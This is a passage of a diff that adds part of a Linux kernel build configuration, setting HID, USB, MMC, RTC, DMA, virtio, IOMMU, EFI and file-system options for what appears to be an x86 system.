+# CONFIG_HID_APPLEIR is not set
+# CONFIG_HID_AUREAL is not set
+# CONFIG_HID_BELKIN is not set
+# CONFIG_HID_BETOP_FF is not set
+# CONFIG_HID_CHERRY is not set
+# CONFIG_HID_CHICONY is not set
+# CONFIG_HID_CORSAIR is not set
+# CONFIG_HID_PRODIKEYS is not set
+# CONFIG_HID_CMEDIA is not set
+# CONFIG_HID_CP2112 is not set
+# CONFIG_HID_CYPRESS is not set
+# CONFIG_HID_DRAGONRISE is not set
+# CONFIG_HID_EMS_FF is not set
+# CONFIG_HID_ELECOM is not set
+# CONFIG_HID_ELO is not set
+# CONFIG_HID_EZKEY is not set
+# CONFIG_HID_GEMBIRD is not set
+# CONFIG_HID_GFRM is not set
+# CONFIG_HID_HOLTEK is not set
+# CONFIG_HID_GT683R is not set
+# CONFIG_HID_KEYTOUCH is not set
+# CONFIG_HID_KYE is not set
+# CONFIG_HID_UCLOGIC is not set
+# CONFIG_HID_WALTOP is not set
+# CONFIG_HID_GYRATION is not set
+# CONFIG_HID_ICADE is not set
+# CONFIG_HID_TWINHAN is not set
+# CONFIG_HID_KENSINGTON is not set
+# CONFIG_HID_LCPOWER is not set
+# CONFIG_HID_LED is not set
+# CONFIG_HID_LENOVO is not set
+# CONFIG_HID_LOGITECH is not set
+# CONFIG_HID_MAGICMOUSE is not set
+# CONFIG_HID_MICROSOFT is not set
+# CONFIG_HID_MONTEREY is not set
+# CONFIG_HID_MULTITOUCH is not set
+# CONFIG_HID_NTRIG is not set
+# CONFIG_HID_ORTEK is not set
+# CONFIG_HID_PANTHERLORD is not set
+# CONFIG_HID_PENMOUNT is not set
+# CONFIG_HID_PETALYNX is not set
+# CONFIG_HID_PICOLCD is not set
+# CONFIG_HID_PLANTRONICS is not set
+# CONFIG_HID_PRIMAX is not set
+# CONFIG_HID_ROCCAT is not set
+# CONFIG_HID_SAITEK is not set
+# CONFIG_HID_SAMSUNG is not set
+# CONFIG_HID_SONY is not set
+# CONFIG_HID_SPEEDLINK is not set
+# CONFIG_HID_STEELSERIES is not set
+# CONFIG_HID_SUNPLUS is not set
+# CONFIG_HID_RMI is not set
+# CONFIG_HID_GREENASIA is not set
+# CONFIG_HID_SMARTJOYPLUS is not set
+# CONFIG_HID_TIVO is not set
+# CONFIG_HID_TOPSEED is not set
+# CONFIG_HID_THINGM is not set
+# CONFIG_HID_THRUSTMASTER is not set
+# CONFIG_HID_WACOM is not set
+# CONFIG_HID_WIIMOTE is not set
+# CONFIG_HID_XINMO is not set
+# CONFIG_HID_ZEROPLUS is not set
+# CONFIG_HID_ZYDACRON is not set
+# CONFIG_HID_SENSOR_HUB is not set
+# CONFIG_HID_ALPS is not set
+
+#
+# USB HID support
+#
+CONFIG_USB_HID=y
+CONFIG_HID_PID=y
+CONFIG_USB_HIDDEV=y
+
+#
+# I2C HID support
+#
+# CONFIG_I2C_HID is not set
+
+#
+# Intel ISH HID support
+#
+CONFIG_INTEL_ISH_HID=y
+CONFIG_USB_OHCI_LITTLE_ENDIAN=y
+CONFIG_USB_SUPPORT=y
+CONFIG_USB_COMMON=y
+CONFIG_USB_ARCH_HAS_HCD=y
+CONFIG_USB=y
+CONFIG_USB_ANNOUNCE_NEW_DEVICES=y
+
+#
+# Miscellaneous USB options
+#
+CONFIG_USB_DEFAULT_PERSIST=y
+# CONFIG_USB_DYNAMIC_MINORS is not set
+# CONFIG_USB_OTG is not set
+# CONFIG_USB_OTG_WHITELIST is not set
+# CONFIG_USB_OTG_BLACKLIST_HUB is not set
+# CONFIG_USB_LEDS_TRIGGER_USBPORT is not set
+CONFIG_USB_MON=y
+# CONFIG_USB_WUSB_CBAF is not set
+
+#
+# USB Host Controller Drivers
+#
+# CONFIG_USB_C67X00_HCD is not set
+CONFIG_USB_XHCI_HCD=y
+CONFIG_USB_XHCI_PCI=y
+CONFIG_USB_XHCI_PLATFORM=y
+CONFIG_USB_EHCI_HCD=y
+CONFIG_USB_EHCI_ROOT_HUB_TT=y
+CONFIG_USB_EHCI_TT_NEWSCHED=y
+CONFIG_USB_EHCI_PCI=y
+CONFIG_USB_EHCI_HCD_PLATFORM=y
+# CONFIG_USB_OXU210HP_HCD is not set
+# CONFIG_USB_ISP116X_HCD is not set
+# CONFIG_USB_ISP1362_HCD is not set
+# CONFIG_USB_FOTG210_HCD is not set
+# CONFIG_USB_MAX3421_HCD is not set
+CONFIG_USB_OHCI_HCD=y
+CONFIG_USB_OHCI_HCD_PCI=y
+CONFIG_USB_OHCI_HCD_PLATFORM=y
+CONFIG_USB_UHCI_HCD=y
+# CONFIG_USB_SL811_HCD is not set
+# CONFIG_USB_R8A66597_HCD is not set
+# CONFIG_USB_HCD_TEST_MODE is not set
+
+#
+# USB Device Class drivers
+#
+CONFIG_USB_ACM=y
+CONFIG_USB_PRINTER=y
+# CONFIG_USB_WDM is not set
+# CONFIG_USB_TMC is not set
+
+#
+# NOTE: USB_STORAGE depends on SCSI but BLK_DEV_SD may
+#
+
+#
+# also be needed; see USB_STORAGE Help for more info
+#
+CONFIG_USB_STORAGE=y
+# CONFIG_USB_STORAGE_DEBUG is not set
+# CONFIG_USB_STORAGE_REALTEK is not set
+# CONFIG_USB_STORAGE_DATAFAB is not set
+# CONFIG_USB_STORAGE_FREECOM is not set
+# CONFIG_USB_STORAGE_ISD200 is not set
+# CONFIG_USB_STORAGE_USBAT is not set
+# CONFIG_USB_STORAGE_SDDR09 is not set
+# CONFIG_USB_STORAGE_SDDR55 is not set
+# CONFIG_USB_STORAGE_JUMPSHOT is not set
+# CONFIG_USB_STORAGE_ALAUDA is not set
+# CONFIG_USB_STORAGE_ONETOUCH is not set
+# CONFIG_USB_STORAGE_KARMA is not set
+# CONFIG_USB_STORAGE_CYPRESS_ATACB is not set
+# CONFIG_USB_STORAGE_ENE_UB6250 is not set
+CONFIG_USB_UAS=y
+
+#
+# USB Imaging devices
+#
+# CONFIG_USB_MDC800 is not set
+# CONFIG_USB_MICROTEK is not set
+# CONFIG_USBIP_CORE is not set
+# CONFIG_USB_MUSB_HDRC is not set
+# CONFIG_USB_DWC3 is not set
+# CONFIG_USB_DWC2 is not set
+# CONFIG_USB_CHIPIDEA is not set
+# CONFIG_USB_ISP1760 is not set
+
+#
+# USB port drivers
+#
+CONFIG_USB_SERIAL=y
+CONFIG_USB_SERIAL_CONSOLE=y
+CONFIG_USB_SERIAL_GENERIC=y
+CONFIG_USB_SERIAL_SIMPLE=y
+# CONFIG_USB_SERIAL_AIRCABLE is not set
+# CONFIG_USB_SERIAL_ARK3116 is not set
+# CONFIG_USB_SERIAL_BELKIN is not set
+# CONFIG_USB_SERIAL_CH341 is not set
+# CONFIG_USB_SERIAL_WHITEHEAT is not set
+# CONFIG_USB_SERIAL_DIGI_ACCELEPORT is not set
+# CONFIG_USB_SERIAL_CP210X is not set
+# CONFIG_USB_SERIAL_CYPRESS_M8 is not set
+# CONFIG_USB_SERIAL_EMPEG is not set
+CONFIG_USB_SERIAL_FTDI_SIO=y
+# CONFIG_USB_SERIAL_VISOR is not set
+# CONFIG_USB_SERIAL_IPAQ is not set
+# CONFIG_USB_SERIAL_IR is not set
+# CONFIG_USB_SERIAL_EDGEPORT is not set
+# CONFIG_USB_SERIAL_EDGEPORT_TI is not set
+# CONFIG_USB_SERIAL_F81232 is not set
+# CONFIG_USB_SERIAL_GARMIN is not set
+# CONFIG_USB_SERIAL_IPW is not set
+# CONFIG_USB_SERIAL_IUU is not set
+# CONFIG_USB_SERIAL_KEYSPAN_PDA is not set
+# CONFIG_USB_SERIAL_KEYSPAN is not set
+# CONFIG_USB_SERIAL_KLSI is not set
+# CONFIG_USB_SERIAL_KOBIL_SCT is not set
+# CONFIG_USB_SERIAL_MCT_U232 is not set
+# CONFIG_USB_SERIAL_METRO is not set
+# CONFIG_USB_SERIAL_MOS7720 is not set
+# CONFIG_USB_SERIAL_MOS7840 is not set
+# CONFIG_USB_SERIAL_MXUPORT is not set
+# CONFIG_USB_SERIAL_NAVMAN is not set
+# CONFIG_USB_SERIAL_PL2303 is not set
+# CONFIG_USB_SERIAL_OTI6858 is not set
+# CONFIG_USB_SERIAL_QCAUX is not set
+# CONFIG_USB_SERIAL_QUALCOMM is not set
+# CONFIG_USB_SERIAL_SPCP8X5 is not set
+# CONFIG_USB_SERIAL_SAFE is not set
+# CONFIG_USB_SERIAL_SIERRAWIRELESS is not set
+# CONFIG_USB_SERIAL_SYMBOL is not set
+# CONFIG_USB_SERIAL_TI is not set
+# CONFIG_USB_SERIAL_CYBERJACK is not set
+# CONFIG_USB_SERIAL_XIRCOM is not set
+# CONFIG_USB_SERIAL_OPTION is not set
+# CONFIG_USB_SERIAL_OMNINET is not set
+# CONFIG_USB_SERIAL_OPTICON is not set
+# CONFIG_USB_SERIAL_XSENS_MT is not set
+# CONFIG_USB_SERIAL_WISHBONE is not set
+# CONFIG_USB_SERIAL_SSU100 is not set
+# CONFIG_USB_SERIAL_QT2 is not set
+# CONFIG_USB_SERIAL_DEBUG is not set
+
+#
+# USB Miscellaneous drivers
+#
+# CONFIG_USB_EMI62 is not set
+# CONFIG_USB_EMI26 is not set
+# CONFIG_USB_ADUTUX is not set
+# CONFIG_USB_SEVSEG is not set
+# CONFIG_USB_RIO500 is not set
+# CONFIG_USB_LEGOTOWER is not set
+# CONFIG_USB_LCD is not set
+# CONFIG_USB_CYPRESS_CY7C63 is not set
+# CONFIG_USB_CYTHERM is not set
+# CONFIG_USB_IDMOUSE is not set
+# CONFIG_USB_FTDI_ELAN is not set
+# CONFIG_USB_APPLEDISPLAY is not set
+# CONFIG_USB_SISUSBVGA is not set
+# CONFIG_USB_LD is not set
+# CONFIG_USB_TRANCEVIBRATOR is not set
+# CONFIG_USB_IOWARRIOR is not set
+# CONFIG_USB_TEST is not set
+# CONFIG_USB_EHSET_TEST_FIXTURE is not set
+# CONFIG_USB_ISIGHTFW is not set
+# CONFIG_USB_YUREX is not set
+# CONFIG_USB_EZUSB_FX2 is not set
+# CONFIG_USB_HSIC_USB3503 is not set
+# CONFIG_USB_HSIC_USB4604 is not set
+# CONFIG_USB_LINK_LAYER_TEST is not set
+# CONFIG_UCSI is not set
+
+#
+# USB Physical Layer drivers
+#
+# CONFIG_USB_PHY is not set
+# CONFIG_NOP_USB_XCEIV is not set
+# CONFIG_USB_GPIO_VBUS is not set
+# CONFIG_USB_ISP1301 is not set
+# CONFIG_USB_GADGET is not set
+CONFIG_USB_LED_TRIG=y
+CONFIG_USB_ULPI_BUS=y
+# CONFIG_UWB is not set
+CONFIG_MMC=y
+# CONFIG_MMC_DEBUG is not set
+CONFIG_PWRSEQ_EMMC=y
+CONFIG_PWRSEQ_SIMPLE=y
+
+#
+# MMC/SD/SDIO Card Drivers
+#
+CONFIG_MMC_BLOCK=y
+CONFIG_MMC_BLOCK_MINORS=8
+CONFIG_MMC_BLOCK_BOUNCE=y
+# CONFIG_SDIO_UART is not set
+# CONFIG_MMC_TEST is not set
+
+#
+# MMC/SD/SDIO Host Controller Drivers
+#
+CONFIG_MMC_SDHCI=y
+CONFIG_MMC_SDHCI_PCI=y
+CONFIG_MMC_RICOH_MMC=y
+CONFIG_MMC_SDHCI_ACPI=y
+CONFIG_MMC_SDHCI_PLTFM=y
+# CONFIG_MMC_SDHCI_OF_ARASAN is not set
+# CONFIG_MMC_SDHCI_OF_AT91 is not set
+# CONFIG_MMC_SDHCI_F_SDH30 is not set
+# CONFIG_MMC_WBSD is not set
+# CONFIG_MMC_TIFM_SD is not set
+CONFIG_MMC_SPI=y
+# CONFIG_MMC_CB710 is not set
+# CONFIG_MMC_VIA_SDMMC is not set
+# CONFIG_MMC_VUB300 is not set
+CONFIG_MMC_USHC=y
+# CONFIG_MMC_USDHI6ROL0 is not set
+# CONFIG_MMC_TOSHIBA_PCI is not set
+# CONFIG_MMC_MTK is not set
+# CONFIG_MEMSTICK is not set
+CONFIG_NEW_LEDS=y
+CONFIG_LEDS_CLASS=y
+# CONFIG_LEDS_CLASS_FLASH is not set
+
+#
+# LED drivers
+#
+# CONFIG_LEDS_BCM6328 is not set
+# CONFIG_LEDS_BCM6358 is not set
+# CONFIG_LEDS_LM3530 is not set
+# CONFIG_LEDS_LM3642 is not set
+# CONFIG_LEDS_PCA9532 is not set
+# CONFIG_LEDS_GPIO is not set
+# CONFIG_LEDS_LP3944 is not set
+# CONFIG_LEDS_LP3952 is not set
+# CONFIG_LEDS_LP5521 is not set
+# CONFIG_LEDS_LP5523 is not set
+# CONFIG_LEDS_LP5562 is not set
+# CONFIG_LEDS_LP8501 is not set
+# CONFIG_LEDS_LP8860 is not set
+# CONFIG_LEDS_CLEVO_MAIL is not set
+# CONFIG_LEDS_PCA955X is not set
+# CONFIG_LEDS_PCA963X is not set
+# CONFIG_LEDS_DAC124S085 is not set
+# CONFIG_LEDS_BD2802 is not set
+# CONFIG_LEDS_INTEL_SS4200 is not set
+# CONFIG_LEDS_LT3593 is not set
+# CONFIG_LEDS_TCA6507 is not set
+# CONFIG_LEDS_TLC591XX is not set
+# CONFIG_LEDS_LM355x is not set
+# CONFIG_LEDS_IS31FL319X is not set
+# CONFIG_LEDS_IS31FL32XX is not set
+
+#
+# LED driver for blink(1) USB RGB LED is under Special HID drivers (HID_THINGM)
+#
+# CONFIG_LEDS_BLINKM is not set
+# CONFIG_LEDS_MLXCPLD is not set
+
+#
+# LED Triggers
+#
+CONFIG_LEDS_TRIGGERS=y
+# CONFIG_LEDS_TRIGGER_TIMER is not set
+# CONFIG_LEDS_TRIGGER_ONESHOT is not set
+# CONFIG_LEDS_TRIGGER_DISK is not set
+# CONFIG_LEDS_TRIGGER_HEARTBEAT is not set
+# CONFIG_LEDS_TRIGGER_BACKLIGHT is not set
+# CONFIG_LEDS_TRIGGER_CPU is not set
+# CONFIG_LEDS_TRIGGER_GPIO is not set
+# CONFIG_LEDS_TRIGGER_DEFAULT_ON is not set
+
+#
+# iptables trigger is under Netfilter config (LED target)
+#
+# CONFIG_LEDS_TRIGGER_TRANSIENT is not set
+# CONFIG_LEDS_TRIGGER_CAMERA is not set
+# CONFIG_LEDS_TRIGGER_PANIC is not set
+# CONFIG_ACCESSIBILITY is not set
+# CONFIG_INFINIBAND is not set
+CONFIG_EDAC_ATOMIC_SCRUB=y
+CONFIG_EDAC_SUPPORT=y
+CONFIG_EDAC=y
+# CONFIG_EDAC_LEGACY_SYSFS is not set
+# CONFIG_EDAC_DEBUG is not set
+CONFIG_EDAC_MM_EDAC=y
+CONFIG_EDAC_GHES=y
+# CONFIG_EDAC_E752X is not set
+# CONFIG_EDAC_I82975X is not set
+# CONFIG_EDAC_I3000 is not set
+# CONFIG_EDAC_I3200 is not set
+# CONFIG_EDAC_IE31200 is not set
+# CONFIG_EDAC_X38 is not set
+# CONFIG_EDAC_I5400 is not set
+# CONFIG_EDAC_I7CORE is not set
+# CONFIG_EDAC_I5000 is not set
+# CONFIG_EDAC_I5100 is not set
+# CONFIG_EDAC_I7300 is not set
+CONFIG_EDAC_SBRIDGE=y
+# CONFIG_EDAC_SKX is not set
+CONFIG_RTC_LIB=y
+CONFIG_RTC_MC146818_LIB=y
+CONFIG_RTC_CLASS=y
+CONFIG_RTC_HCTOSYS=y
+CONFIG_RTC_HCTOSYS_DEVICE="rtc0"
+CONFIG_RTC_SYSTOHC=y
+CONFIG_RTC_SYSTOHC_DEVICE="rtc0"
+# CONFIG_RTC_DEBUG is not set
+
+#
+# RTC interfaces
+#
+CONFIG_RTC_INTF_SYSFS=y
+CONFIG_RTC_INTF_PROC=y
+CONFIG_RTC_INTF_DEV=y
+# CONFIG_RTC_INTF_DEV_UIE_EMUL is not set
+# CONFIG_RTC_DRV_TEST is not set
+
+#
+# I2C RTC drivers
+#
+# CONFIG_RTC_DRV_ABB5ZES3 is not set
+# CONFIG_RTC_DRV_ABX80X is not set
+# CONFIG_RTC_DRV_DS1307 is not set
+# CONFIG_RTC_DRV_DS1374 is not set
+# CONFIG_RTC_DRV_DS1672 is not set
+# CONFIG_RTC_DRV_HYM8563 is not set
+# CONFIG_RTC_DRV_MAX6900 is not set
+# CONFIG_RTC_DRV_RS5C372 is not set
+# CONFIG_RTC_DRV_ISL1208 is not set
+# CONFIG_RTC_DRV_ISL12022 is not set
+# CONFIG_RTC_DRV_X1205 is not set
+# CONFIG_RTC_DRV_PCF8523 is not set
+# CONFIG_RTC_DRV_PCF85063 is not set
+# CONFIG_RTC_DRV_PCF8563 is not set
+# CONFIG_RTC_DRV_PCF8583 is not set
+# CONFIG_RTC_DRV_M41T80 is not set
+# CONFIG_RTC_DRV_BQ32K is not set
+# CONFIG_RTC_DRV_S35390A is not set
+# CONFIG_RTC_DRV_FM3130 is not set
+# CONFIG_RTC_DRV_RX8010 is not set
+# CONFIG_RTC_DRV_RX8581 is not set
+# CONFIG_RTC_DRV_RX8025 is not set
+# CONFIG_RTC_DRV_EM3027 is not set
+# CONFIG_RTC_DRV_RV8803 is not set
+
+#
+# SPI RTC drivers
+#
+# CONFIG_RTC_DRV_M41T93 is not set
+# CONFIG_RTC_DRV_M41T94 is not set
+# CONFIG_RTC_DRV_DS1302 is not set
+# CONFIG_RTC_DRV_DS1305 is not set
+# CONFIG_RTC_DRV_DS1343 is not set
+# CONFIG_RTC_DRV_DS1347 is not set
+# CONFIG_RTC_DRV_DS1390 is not set
+# CONFIG_RTC_DRV_MAX6916 is not set
+# CONFIG_RTC_DRV_R9701 is not set
+# CONFIG_RTC_DRV_RX4581 is not set
+# CONFIG_RTC_DRV_RX6110 is not set
+# CONFIG_RTC_DRV_RS5C348 is not set
+# CONFIG_RTC_DRV_MAX6902 is not set
+# CONFIG_RTC_DRV_PCF2123 is not set
+# CONFIG_RTC_DRV_MCP795 is not set
+CONFIG_RTC_I2C_AND_SPI=y
+
+#
+# SPI and I2C RTC drivers
+#
+# CONFIG_RTC_DRV_DS3232 is not set
+# CONFIG_RTC_DRV_PCF2127 is not set
+# CONFIG_RTC_DRV_RV3029C2 is not set
+
+#
+# Platform RTC drivers
+#
+CONFIG_RTC_DRV_CMOS=y
+# CONFIG_RTC_DRV_DS1286 is not set
+# CONFIG_RTC_DRV_DS1511 is not set
+# CONFIG_RTC_DRV_DS1553 is not set
+# CONFIG_RTC_DRV_DS1685_FAMILY is not set
+# CONFIG_RTC_DRV_DS1742 is not set
+# CONFIG_RTC_DRV_DS2404 is not set
+# CONFIG_RTC_DRV_STK17TA8 is not set
+# CONFIG_RTC_DRV_M48T86 is not set
+# CONFIG_RTC_DRV_M48T35 is not set
+# CONFIG_RTC_DRV_M48T59 is not set
+# CONFIG_RTC_DRV_MSM6242 is not set
+# CONFIG_RTC_DRV_BQ4802 is not set
+# CONFIG_RTC_DRV_RP5C01 is not set
+# CONFIG_RTC_DRV_V3020 is not set
+# CONFIG_RTC_DRV_ZYNQMP is not set
+
+#
+# on-CPU RTC drivers
+#
+# CONFIG_RTC_DRV_SNVS is not set
+
+#
+# HID Sensor RTC drivers
+#
+# CONFIG_RTC_DRV_HID_SENSOR_TIME is not set
+CONFIG_DMADEVICES=y
+# CONFIG_DMADEVICES_DEBUG is not set
+
+#
+# DMA Devices
+#
+CONFIG_DMA_ENGINE=y
+CONFIG_DMA_VIRTUAL_CHANNELS=y
+CONFIG_DMA_ACPI=y
+CONFIG_DMA_OF=y
+# CONFIG_FSL_EDMA is not set
+CONFIG_INTEL_IDMA64=y
+CONFIG_INTEL_IOATDMA=y
+# CONFIG_QCOM_HIDMA_MGMT is not set
+# CONFIG_QCOM_HIDMA is not set
+CONFIG_DW_DMAC_CORE=y
+CONFIG_DW_DMAC=y
+CONFIG_DW_DMAC_PCI=y
+CONFIG_HSU_DMA=y
+
+#
+# DMA Clients
+#
+# CONFIG_ASYNC_TX_DMA is not set
+# CONFIG_DMATEST is not set
+CONFIG_DMA_ENGINE_RAID=y
+
+#
+# DMABUF options
+#
+# CONFIG_SYNC_FILE is not set
+CONFIG_DCA=y
+CONFIG_AUXDISPLAY=y
+# CONFIG_IMG_ASCII_LCD is not set
+CONFIG_UIO=y
+# CONFIG_UIO_CIF is not set
+# CONFIG_UIO_PDRV_GENIRQ is not set
+# CONFIG_UIO_DMEM_GENIRQ is not set
+# CONFIG_UIO_AEC is not set
+# CONFIG_UIO_SERCOS3 is not set
+# CONFIG_UIO_PCI_GENERIC is not set
+# CONFIG_UIO_NETX is not set
+# CONFIG_UIO_PRUSS is not set
+# CONFIG_UIO_MF624 is not set
+# CONFIG_VFIO is not set
+CONFIG_IRQ_BYPASS_MANAGER=y
+CONFIG_VIRT_DRIVERS=y
+CONFIG_VIRTIO=y
+
+#
+# Virtio drivers
+#
+CONFIG_VIRTIO_PCI=y
+# CONFIG_VIRTIO_PCI_LEGACY is not set
+CONFIG_VIRTIO_BALLOON=y
+CONFIG_VIRTIO_INPUT=y
+CONFIG_VIRTIO_MMIO=y
+# CONFIG_VIRTIO_MMIO_CMDLINE_DEVICES is not set
+
+#
+# Microsoft Hyper-V guest support
+#
+# CONFIG_HYPERV is not set
+# CONFIG_STAGING is not set
+CONFIG_X86_PLATFORM_DEVICES=y
+# CONFIG_ACER_WMI is not set
+# CONFIG_ACERHDF is not set
+# CONFIG_ALIENWARE_WMI is not set
+# CONFIG_ASUS_LAPTOP is not set
+# CONFIG_DELL_WMI_AIO is not set
+# CONFIG_DELL_SMO8800 is not set
+# CONFIG_DELL_RBTN is not set
+# CONFIG_FUJITSU_LAPTOP is not set
+# CONFIG_FUJITSU_TABLET is not set
+# CONFIG_AMILO_RFKILL is not set
+# CONFIG_HP_ACCEL is not set
+# CONFIG_HP_WIRELESS is not set
+# CONFIG_HP_WMI is not set
+# CONFIG_MSI_LAPTOP is not set
+# CONFIG_PANASONIC_LAPTOP is not set
+# CONFIG_COMPAL_LAPTOP is not set
+# CONFIG_SONY_LAPTOP is not set
+# CONFIG_IDEAPAD_LAPTOP is not set
+# CONFIG_THINKPAD_ACPI is not set
+# CONFIG_SENSORS_HDAPS is not set
+# CONFIG_INTEL_MENLOW is not set
+# CONFIG_ASUS_WIRELESS is not set
+CONFIG_ACPI_WMI=y
+# CONFIG_MSI_WMI is not set
+# CONFIG_TOPSTAR_LAPTOP is not set
+CONFIG_TOSHIBA_BT_RFKILL=y
+CONFIG_TOSHIBA_HAPS=y
+CONFIG_TOSHIBA_WMI=y
+# CONFIG_ACPI_CMPC is not set
+CONFIG_INTEL_HID_EVENT=y
+CONFIG_INTEL_VBTN=y
+# CONFIG_INTEL_IPS is not set
+# CONFIG_INTEL_PMC_CORE is not set
+# CONFIG_IBM_RTL is not set
+# CONFIG_SAMSUNG_LAPTOP is not set
+# CONFIG_MXM_WMI is not set
+# CONFIG_INTEL_OAKTRAIL is not set
+# CONFIG_SAMSUNG_Q10 is not set
+# CONFIG_APPLE_GMUX is not set
+# CONFIG_INTEL_RST is not set
+# CONFIG_INTEL_SMARTCONNECT is not set
+# CONFIG_PVPANIC is not set
+CONFIG_INTEL_PMC_IPC=y
+# CONFIG_SURFACE_PRO3_BUTTON is not set
+CONFIG_INTEL_PUNIT_IPC=y
+# CONFIG_INTEL_TELEMETRY is not set
+# CONFIG_CHROME_PLATFORMS is not set
+CONFIG_CLKDEV_LOOKUP=y
+CONFIG_HAVE_CLK_PREPARE=y
+CONFIG_COMMON_CLK=y
+
+#
+# Common Clock Framework
+#
+# CONFIG_COMMON_CLK_SI5351 is not set
+# CONFIG_COMMON_CLK_SI514 is not set
+# CONFIG_COMMON_CLK_SI570 is not set
+# CONFIG_COMMON_CLK_CDCE706 is not set
+# CONFIG_COMMON_CLK_CDCE925 is not set
+# CONFIG_COMMON_CLK_CS2000_CP is not set
+# CONFIG_COMMON_CLK_NXP is not set
+# CONFIG_COMMON_CLK_PXA is not set
+# CONFIG_COMMON_CLK_PIC32 is not set
+
+#
+# Hardware Spinlock drivers
+#
+
+#
+# Clock Source drivers
+#
+CONFIG_CLKEVT_I8253=y
+CONFIG_I8253_LOCK=y
+CONFIG_CLKBLD_I8253=y
+# CONFIG_ATMEL_PIT is not set
+# CONFIG_SH_TIMER_CMT is not set
+# CONFIG_SH_TIMER_MTU2 is not set
+# CONFIG_SH_TIMER_TMU is not set
+# CONFIG_EM_TIMER_STI is not set
+# CONFIG_MAILBOX is not set
+CONFIG_IOMMU_API=y
+CONFIG_IOMMU_SUPPORT=y
+
+#
+# Generic IOMMU Pagetable Support
+#
+CONFIG_IOMMU_IOVA=y
+CONFIG_OF_IOMMU=y
+# CONFIG_AMD_IOMMU is not set
+CONFIG_DMAR_TABLE=y
+CONFIG_INTEL_IOMMU=y
+CONFIG_INTEL_IOMMU_SVM=y
+CONFIG_INTEL_IOMMU_DEFAULT_ON=y
+CONFIG_INTEL_IOMMU_FLOPPY_WA=y
+CONFIG_IRQ_REMAP=y
+
+#
+# Remoteproc drivers
+#
+# CONFIG_STE_MODEM_RPROC is not set
+
+#
+# Rpmsg drivers
+#
+
+#
+# SOC (System On Chip) specific Drivers
+#
+
+#
+# Broadcom SoC drivers
+#
+# CONFIG_SUNXI_SRAM is not set
+# CONFIG_SOC_TI is not set
+CONFIG_PM_DEVFREQ=y
+
+#
+# DEVFREQ Governors
+#
+# CONFIG_DEVFREQ_GOV_SIMPLE_ONDEMAND is not set
+# CONFIG_DEVFREQ_GOV_PERFORMANCE is not set
+# CONFIG_DEVFREQ_GOV_POWERSAVE is not set
+# CONFIG_DEVFREQ_GOV_USERSPACE is not set
+# CONFIG_DEVFREQ_GOV_PASSIVE is not set
+
+#
+# DEVFREQ Drivers
+#
+# CONFIG_PM_DEVFREQ_EVENT is not set
+# CONFIG_EXTCON is not set
+# CONFIG_MEMORY is not set
+# CONFIG_IIO is not set
+# CONFIG_NTB is not set
+# CONFIG_VME_BUS is not set
+# CONFIG_PWM is not set
+CONFIG_IRQCHIP=y
+CONFIG_ARM_GIC_MAX_NR=1
+# CONFIG_IPACK_BUS is not set
+# CONFIG_RESET_CONTROLLER is not set
+# CONFIG_FMC is not set
+
+#
+# PHY Subsystem
+#
+CONFIG_GENERIC_PHY=y
+# CONFIG_PHY_PXA_28NM_HSIC is not set
+# CONFIG_PHY_PXA_28NM_USB2 is not set
+# CONFIG_BCM_KONA_USB2_PHY is not set
+# CONFIG_PHY_TUSB1210 is not set
+CONFIG_POWERCAP=y
+CONFIG_INTEL_RAPL=y
+# CONFIG_MCB is not set
+
+#
+# Performance monitor support
+#
+CONFIG_RAS=y
+# CONFIG_THUNDERBOLT is not set
+
+#
+# Android
+#
+# CONFIG_ANDROID is not set
+# CONFIG_LIBNVDIMM is not set
+# CONFIG_DEV_DAX is not set
+# CONFIG_NVMEM is not set
+# CONFIG_STM is not set
+# CONFIG_INTEL_TH is not set
+
+#
+# FPGA Configuration Support
+#
+# CONFIG_FPGA is not set
+
+#
+# Firmware Drivers
+#
+# CONFIG_EDD is not set
+CONFIG_FIRMWARE_MEMMAP=y
+# CONFIG_DELL_RBU is not set
+# CONFIG_DCDBAS is not set
+CONFIG_DMIID=y
+# CONFIG_DMI_SYSFS is not set
+CONFIG_DMI_SCAN_MACHINE_NON_EFI_FALLBACK=y
+# CONFIG_ISCSI_IBFT_FIND is not set
+CONFIG_FW_CFG_SYSFS=y
+# CONFIG_FW_CFG_SYSFS_CMDLINE is not set
+# CONFIG_GOOGLE_FIRMWARE is not set
+
+#
+# EFI (Extensible Firmware Interface) Support
+#
+CONFIG_EFI_VARS=y
+CONFIG_EFI_ESRT=y
+CONFIG_EFI_VARS_PSTORE=y
+# CONFIG_EFI_VARS_PSTORE_DEFAULT_DISABLE is not set
+# CONFIG_EFI_FAKE_MEMMAP is not set
+CONFIG_EFI_RUNTIME_WRAPPERS=y
+CONFIG_EFI_BOOTLOADER_CONTROL=y
+CONFIG_EFI_CAPSULE_LOADER=y
+# CONFIG_EFI_TEST is not set
+CONFIG_UEFI_CPER=y
+
+#
+# File systems
+#
+CONFIG_DCACHE_WORD_ACCESS=y
+# CONFIG_EXT2_FS is not set
+# CONFIG_EXT3_FS is not set
+CONFIG_EXT4_FS=y
+CONFIG_EXT4_USE_FOR_EXT2=y
+CONFIG_EXT4_FS_POSIX_ACL=y
+CONFIG_EXT4_FS_SECURITY=y
+CONFIG_EXT4_ENCRYPTION=y
+CONFIG_EXT4_FS_ENCRYPTION=y
+# CONFIG_EXT4_DEBUG is not set
+CONFIG_JBD2=y
+# CONFIG_JBD2_DEBUG is not set
+CONFIG_FS_MBCACHE=y
+# CONFIG_REISERFS_FS is not set
+# CONFIG_JFS_FS is not set
+# CONFIG_XFS_FS is not set
+# CONFIG_GFS2_FS is not set
+# CONFIG_OCFS2_FS is not set
+CONFIG_BTRFS_FS=y
+CONFIG_BTRFS_FS_POSIX_ACL=y
+# CONFIG_BTRFS_FS_CHECK_INTEGRITY is not set
+# CONFIG_BTRFS_FS_RUN_SANITY_TESTS is not set
+# CONFIG_BTRFS_DEBUG is not set
+# CONFIG_BTRFS_ASSERT is not set
+# CONFIG_NILFS2_FS is not set
+CONFIG_F2FS_FS=y
+CONFIG_F2FS_FS_XATTR=y
+CONFIG_F2FS_FS_POSIX_ACL=y
+CONFIG_F2FS_FS_SECURITY=y
+CONFIG_F2FS_CHECK_FS=y
+CONFIG_F2FS_FS_ENCRYPTION=y
+# CONFIG_F2FS_FAULT_INJECTION is not set
+# CONFIG_FS_DAX is not set
+CONFIG_FS_POSIX_ACL=y
+CONFIG_EXPORTFS=y
+# CONFIG_EXPORTFS_BLOCK_OPS is not set
+CONFIG_FILE_LOCKING=y
+CONFIG_MANDATORY_FILE_LOCKING=y
+CONFIG_FS_ENCRYPTION=y
+CONFIG_FSNOTIFY=y
+CONFIG_DNOTIFY=y
+CONFIG_INOTIFY_USER=y
+CONFIG_FANOTIFY=y
